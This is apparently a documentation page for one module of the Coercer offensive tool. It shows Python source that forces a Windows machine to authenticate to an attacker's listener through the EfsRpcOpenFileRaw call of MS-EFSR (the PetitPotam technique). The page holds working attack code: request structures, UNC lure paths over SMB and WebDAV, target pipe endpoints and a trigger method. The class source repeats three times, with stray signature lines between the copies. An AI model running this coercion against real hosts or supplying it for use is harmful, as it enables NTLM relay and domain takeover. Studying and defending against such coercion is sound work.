coercer.methods.MS_EFSR.EfsRpcOpenFileRaw

  1#!/usr/bin/env python3
  2# -*- coding: utf-8 -*-
  3# File name          : EfsRpcOpenFileRaw.py
  4# Author             : Podalirius (@podalirius_)
  5# Date created       : 16 Sep 2022
  6
  7
  8from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
  9from coercer.network.DCERPCSessionError import DCERPCSessionError
 10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
 11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID
 12
 13
class _EfsRpcOpenFileRaw(NDRCALL):
    """
    NDR request body for EfsRpcOpenFileRaw (opnum 0) of the [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31).

    Only the two ``[in]`` parameters are marshalled: ``FileName`` (a wide string,
    the UNC lure the server is coerced into opening) and ``Flags``. The
    ``hContext`` handle of the IDL signature is ``[out]`` only and so does not
    appear in the request (per MS-EFSR 3.1.4.2.1 -- verify against the spec).
    """
    opnum = 0  # EfsRpcOpenFileRaw
    # (field name, NDR type) pairs in wire order; impacket encodes them in sequence.
    structure = (
        ('FileName', WSTR),  # [in, string] wchar_t *
        ('Flags', LONG),     # [in] long
    )
 23
 24
class _EfsRpcOpenFileRawResponse(NDRCALL):
    """
    Placeholder for the reply to EfsRpcOpenFileRaw (opnum 0) of the [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31).

    The structure is deliberately empty: the coercion only needs the server to
    *attempt* the open, so the ``[out]`` handle and status of the reply are never
    decoded. NOTE(review): with no fields declared, whatever reply bytes impacket
    hands back stay unparsed; add the ``[out]`` fields from MS-EFSR here if the
    server's real error code is ever needed.
    """
    structure = ()
 30
 31
class EfsRpcOpenFileRaw(MSPROTOCOLRPCCALL):
    """
    Coerce a target into authenticating to an attacker-controlled host through
    EfsRpcOpenFileRaw (opnum 0) of the [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31).

    The lure is the ``FileName`` argument: a UNC path whose host part is the
    ``{{listener}}`` placeholder (see ``exploit_paths``). The ``("smb", ...)``
    and ``("http", ...)`` tags presumably select the listener the framework
    expects the target to connect back to; the forward-slash form is the usual
    way to steer the connection to WebDAV rather than SMB -- verify in the
    framework's path expansion.

    Method found by:
     - [@topotam77](https://twitter.com/topotam77)

    NOTE(review): the reply structure for this call is empty, so nothing the
    server returns is decoded; whether the coercion fired is judged by the
    caller from the value ``trigger()`` returns, not from the response body.
    """

    # Templates for the FileName lure. Placeholders ({{listener}}, {{*_listen_port}},
    # {{rnd(N)}}) are expanded by the framework before trigger() runs -- presumably
    # into self.path. Each template ends with an explicit NUL so the WSTR is
    # terminated on the wire.
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Endpoints on which the EFSRPC interface is reachable. Two interface UUIDs are
    # listed because MS-EFSR registers the interface under df1941c5-... on
    # \PIPE\efsrpc and under c681d488-... on \PIPE\lsarpc (MS-EFSR 2.1 -- verify);
    # the samr/lsass/netlogon pipes are additional names for the same server
    # process, presumably, and are tried with the lsarpc UUID.
    # NOTE(review): the transport key is spelled "ncan_np" (not "ncacn_np"); it is a
    # runtime key the rest of coercer matches on, so it is kept exactly as-is.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\efsrpc",
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsarpc",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\samr",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsass",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\netlogon",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
        ],
        # Direct TCP binding (no named pipe); requires the endpoint mapper to
        # resolve a port for the interface -- the framework's job, not this class's.
        "ncacn_ip_tcp": [
            {
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
        "shortname": "MS-EFSR"
    }

    # "vulnerable_arguments" names the field the lure is injected into.
    function = {
        "name": "EfsRpcOpenFileRaw",
        "opnum": 0,
        "vulnerable_arguments": ["FileName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one EfsRpcOpenFileRaw request carrying ``self.path`` as FileName.

        :param dcerpc_session: an already-bound impacket DCE/RPC session (the
            caller must have called ``connect()``). ``None`` is reported on stdout
            and nothing is sent.
        :param target: accepted for signature parity with the other methods;
            unused here.
        :return: ``""`` when the request completed without raising; the exception
            object when the request raised; ``None`` when no session was given.
            Every exception is returned rather than re-raised so the caller can
            classify it -- presumably certain RPC faults (e.g. a bad network path
            after the server attempted the UNC open) count as a successful
            coercion there; verify in the caller.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None

        try:
            req = _EfsRpcOpenFileRaw()
            req['FileName'] = self.path
            req['Flags'] = 0  # no CREATE_FOR_IMPORT/CREATE_FOR_DIR: plain open
            dcerpc_session.request(req)
        except Exception as caught:
            # Hand the failure back instead of raising; see the docstring.
            return caught
        return ""
class EfsRpcOpenFileRaw(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
class EfsRpcOpenFileRaw(MSPROTOCOLRPCCALL):
    """
    Coerce a target into authenticating to an attacker-controlled host through
    EfsRpcOpenFileRaw (opnum 0) of the [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31).

    The lure is the ``FileName`` argument: a UNC path whose host part is the
    ``{{listener}}`` placeholder (see ``exploit_paths``). The ``("smb", ...)``
    and ``("http", ...)`` tags presumably select the listener the framework
    expects the target to connect back to; the forward-slash form is the usual
    way to steer the connection to WebDAV rather than SMB -- verify in the
    framework's path expansion.

    Method found by:
     - [@topotam77](https://twitter.com/topotam77)

    NOTE(review): the reply structure for this call is empty, so nothing the
    server returns is decoded; whether the coercion fired is judged by the
    caller from the value ``trigger()`` returns, not from the response body.
    """

    # Templates for the FileName lure. Placeholders ({{listener}}, {{*_listen_port}},
    # {{rnd(N)}}) are expanded by the framework before trigger() runs -- presumably
    # into self.path. Each template ends with an explicit NUL so the WSTR is
    # terminated on the wire.
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Endpoints on which the EFSRPC interface is reachable. Two interface UUIDs are
    # listed because MS-EFSR registers the interface under df1941c5-... on
    # \PIPE\efsrpc and under c681d488-... on \PIPE\lsarpc (MS-EFSR 2.1 -- verify);
    # the samr/lsass/netlogon pipes are additional names for the same server
    # process, presumably, and are tried with the lsarpc UUID.
    # NOTE(review): the transport key is spelled "ncan_np" (not "ncacn_np"); it is a
    # runtime key the rest of coercer matches on, so it is kept exactly as-is.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\efsrpc",
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsarpc",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\samr",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsass",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\netlogon",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
        ],
        # Direct TCP binding (no named pipe); requires the endpoint mapper to
        # resolve a port for the interface -- the framework's job, not this class's.
        "ncacn_ip_tcp": [
            {
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
        "shortname": "MS-EFSR"
    }

    # "vulnerable_arguments" names the field the lure is injected into.
    function = {
        "name": "EfsRpcOpenFileRaw",
        "opnum": 0,
        "vulnerable_arguments": ["FileName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one EfsRpcOpenFileRaw request carrying ``self.path`` as FileName.

        :param dcerpc_session: an already-bound impacket DCE/RPC session (the
            caller must have called ``connect()``). ``None`` is reported on stdout
            and nothing is sent.
        :param target: accepted for signature parity with the other methods;
            unused here.
        :return: ``""`` when the request completed without raising; the exception
            object when the request raised; ``None`` when no session was given.
            Every exception is returned rather than re-raised so the caller can
            classify it -- presumably certain RPC faults (e.g. a bad network path
            after the server attempted the UNC open) count as a successful
            coercion there; verify in the caller.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None

        try:
            req = _EfsRpcOpenFileRaw()
            req['FileName'] = self.path
            req['Flags'] = 0  # no CREATE_FOR_IMPORT/CREATE_FOR_DIR: plain open
            dcerpc_session.request(req)
        except Exception as caught:
            # Hand the failure back instead of raising; see the docstring.
            return caught
        return ""

Coercing a machine to authenticate using function EfsRpcOpenFileRaw (opnum 0) of MS-EFSR Protocol

Method found by: [@topotam77](https://twitter.com/topotam77)

exploit_paths = [('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access = {'ncan_np': [{'namedpipe': '\\PIPE\\efsrpc', 'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsarpc', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\samr', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsass', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\netlogon', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}]}
protocol = {'longname': '[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol', 'shortname': 'MS-EFSR'}
function = {'name': 'EfsRpcOpenFileRaw', 'opnum': 0, 'vulnerable_arguments': ['FileName']}
def trigger(self, dcerpc_session, target):
    def trigger(self, dcerpc_session, target):
        """
        Send one EfsRpcOpenFileRaw request carrying ``self.path`` as FileName.

        :param dcerpc_session: an already-bound impacket DCE/RPC session (the
            caller must have called ``connect()``). ``None`` is reported on stdout
            and nothing is sent.
        :param target: accepted for signature parity with the other methods;
            unused here.
        :return: ``""`` when the request completed without raising; the exception
            object when the request raised; ``None`` when no session was given.
            Every exception is returned rather than re-raised so the caller can
            classify it -- presumably certain RPC faults (e.g. a bad network path
            after the server attempted the UNC open) count as a successful
            coercion there; verify in the caller.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None

        try:
            req = _EfsRpcOpenFileRaw()
            req['FileName'] = self.path
            req['Flags'] = 0  # no CREATE_FOR_IMPORT/CREATE_FOR_DIR: plain open
            dcerpc_session.request(req)
        except Exception as caught:
            # Hand the failure back instead of raising; see the docstring.
            return caught
        return ""